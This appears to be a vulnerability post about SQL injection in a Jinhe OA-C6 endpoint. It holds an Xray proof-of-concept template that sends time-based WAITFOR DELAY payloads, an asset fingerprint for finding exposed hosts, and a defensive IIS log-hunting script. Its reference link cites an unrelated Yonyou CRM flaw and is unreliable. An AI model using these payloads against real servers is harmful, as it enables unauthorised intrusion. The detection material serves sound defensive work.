SQL injection vulnerability in the IncentivePlanFulfillAppprove.aspx endpoint of the Jinhe OA-C6 system

  Reference link:

 https://github.com/wy876/POC/blob/1a7300f4f0793a08d1255a474e71a4854613ffd2/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8CRM%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3setremindtoold.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

Vulnerability description:

The IncentivePlanFulfillAppprove.aspx endpoint of the Jinhe OA-C6 system is vulnerable to SQL injection.

Asset fingerprint:

app="金和网络-金和OA"

 Xray-poc:

 

name: poc-yaml-jinhe-oa-c6-incentiveplanfulfillappprove-sqli
transport: http
set:
  sleepSecond1: randomInt(6, 8)
  sleepSecond2: randomInt(3, 5)
rules:
  r0:
    request:
      method: GET
      path: /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:0'--
      headers:
        Content-Type: application/x-www-form-urlencoded
    expression: >-
      response.status == 200 && response.headers["Content-Length"]=="38"
    output:
      undelayedLantency: response.latency
  r1:
    request:
      method: GET
      path: /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:{{sleepSecond1}}'--
      headers:
        Content-Type: application/x-www-form-urlencoded
    expression: >-
      response.latency - undelayedLantency >= sleepSecond1 * 1000 - 1000 && response.status == 200 && response.headers["Content-Length"]=="38"
  r2:
    request:
      method: GET
      path: /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:{{sleepSecond2}}'--
      headers:
        Content-Type: application/x-www-form-urlencoded
    expression: >-
      response.latency - undelayedLantency >= sleepSecond2 * 1000 - 1000 && response.status == 200 && response.headers["Content-Length"]=="38"
expression: r0() && r1() && r2()
detail:
  author: Cysec
  links:
    - https://github.com/wy876/POC/blob/1a7300f4f0793a08d1255a474e71a4854613ffd2/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8CRM%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3setremindtoold.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  description: 金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞
  fofakewrods: app="金和网络-金和OA"
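For defenders, the same pattern the PoC sends can be hunted in web server logs. The script below is an added example, not part of the original post: it scans IIS W3C logs for requests to this endpoint whose httpOID value is not a plain integer, and marks the ones where the response time matches the requested WAITFOR delay. It assumes the cs-uri-query and time-taken fields are enabled in logging; the log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log sample (not real traffic); IPs are from documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken
2025-03-10 08:00:01 GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx httpOID=1042 192.0.2.10 200 85
2025-03-10 08:01:12 GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/ httpOID=1;WAITFOR+DELAY+'0:0:0'-- 198.51.100.7 200 92
2025-03-10 08:01:13 GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/ httpOID=1%3BWAITFOR%20DELAY%20'0:0:7'-- 198.51.100.7 200 7105
2025-03-10 08:01:21 GET /c6/jhsoft.web.incentiveplan/incentiveplanfulfillappprove.aspx/ httpOID=1;waitfor+delay+'0:0:4'-- 198.51.100.7 200 4090
2025-03-10 08:02:00 GET /C6/default.aspx - 192.0.2.10 200 30
"""

ENDPOINT = "incentiveplanfulfillappprove.aspx"  # compared case-insensitively
DELAY_RE = re.compile(r"waitfor\s+delay\s+'(\d+):(\d+):(\d+)'", re.I)

def get_param(query, name):
    """Return the URL-decoded value of one query parameter, or None if absent."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key.lower() == name.lower():
            return unquote_plus(value)
    return None

def scan(log_text):
    """Yield a finding for each request to the endpoint with a non-integer httpOID."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        if ENDPOINT not in rec.get("cs-uri-stem", "").lower():
            continue
        value = get_param(rec.get("cs-uri-query", ""), "httpOID")
        if value is None or value.isdigit():
            continue  # legitimate requests carry a plain numeric id
        m = DELAY_RE.search(value)
        asked_ms = (int(m[1]) * 3600 + int(m[2]) * 60 + int(m[3])) * 1000 if m else 0
        # Same 1-second tolerance as the probe: the server slept about as long as asked.
        honoured = asked_ms > 0 and int(rec.get("time-taken", 0)) >= asked_ms - 1000
        yield {"ip": rec["c-ip"], "time": rec["date"] + " " + rec["time"],
               "value": value, "delay_honoured": honoured}

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `delay_honoured` set to true means the database executed the injected delay, so that host should be treated as confirmed vulnerable rather than merely probed.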

 

posted @ Cysec